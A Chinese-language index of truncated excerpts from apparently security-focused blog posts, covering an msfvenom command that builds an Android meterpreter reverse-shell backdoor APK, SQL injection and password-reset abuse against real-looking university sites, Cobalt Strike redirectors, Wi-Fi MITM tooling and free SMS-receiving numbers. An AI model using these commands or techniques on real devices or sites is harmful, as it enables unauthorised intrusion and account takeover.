环境：攻击方：nethuner（OnePlus 6t) 192.168.1.83目标机：vivo y551、生成后门程序msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.83 LPORT=5555 R>1.apk #生成后门程序（1...

1.访问网站：http://www.xxxx.ac.in/news.php?id=22.判断是否存在sql注入payload:http://www.xxxx.ac.in/news.php?id=2%273.这么一看，明显就是报错注入了，既然是报错注入那么一般就是updatexm...

1.访问网页：http://xxx.xxx.edu.cn:9091/findpwd2.在输入用户名的输入框中进行测试寻找有的用户名 3.发现test用户名存在进行尝试获取验证码，使用burp抓包进行获取验证码 4.填写成自己的手机...

0x01 前景在进行fofa盲打站点的时候，来到了一个后台管理处看到集市二字，应该是edu站点 确认目标身份【归属】（使用的quake进行然后去ipc备案查询）  网站后台很像cms搭建的，在查看网站时...

免责声明：本工具仅供安全研究和教学目的使用，用户须自行承担因使用该工具而引起的一切法律及相关责任。作者概不对任何法律责任承担责任，且保留随时中止、修改或终止本工具的权利。使用者应当...

原理图环境云服务器（teamserver）centos （apache中转）实战中中转机使用肉鸡或者国外服务器即可，这里没那么多公网服务器使用虚拟机代替win10（受害者）win7（cs客户端）1、代理机安装Apachec...

前言MANA 允许您执行各种 Wi-Fi 攻击，即使使用 Android 设备也是如此。MANA（MITM 和网络攻击）无线工具包是一套工具，可用于执行中间人 （MITM） 攻击、创建恶意接入点、拒绝服务 （DoS） 攻...

前言自从windows推出的WSL功能，对广大的Linux和嵌入式开发者来说是巨大福利，基本可以媲美日常vmware虚拟机的替换。但WSL还是存在一些不足，其中两点比较重要：WSL环境如何访问宿主机的USB设备...

声明：该公众号分享的安全工具和项目均来源于网络，仅供安全研究与学习之用，如用于其他用途，由使用者承担全部法律及连带责任，与工具作者和本公众号无关。工具介绍CloakQuest3r是一款功能强大...

前言在渗透测试中，攻击者可以通过对app进行逆向分析。获取app访问的url或者IP。从而对IP进行攻击，本文为大家介绍的这款工具，可以方便的为你分析app中存在的url。注意：本文仅供学习和研究，...

 软件下载地址推荐阅读一，朋友圈互动找回删除的微信好友1，如果已删除的微信好友，曾经在自己的朋友圈给自己点过赞，甚至发表过评论，则只需要打开自己的微信，点击“发现”，“朋友圈”，再...

声明：本技术非常强大，本号只分享技术，切勿用在其他方面。如若有渠道，可以出售，请遵守开源协议。并遵守国家法律法规！一个数字取证平台以及 The Sleuth Kit® 和其他数字取证工具的图形界面...

只列了一些出来，需要更多可以在搜索引擎网站搜关键词“Receive SMS”https://tiger-sms.com/free 免费法国号码FREE NUMBERS：https://tx.me/smsnam telegram上的国外免费短信验证码接码频道，...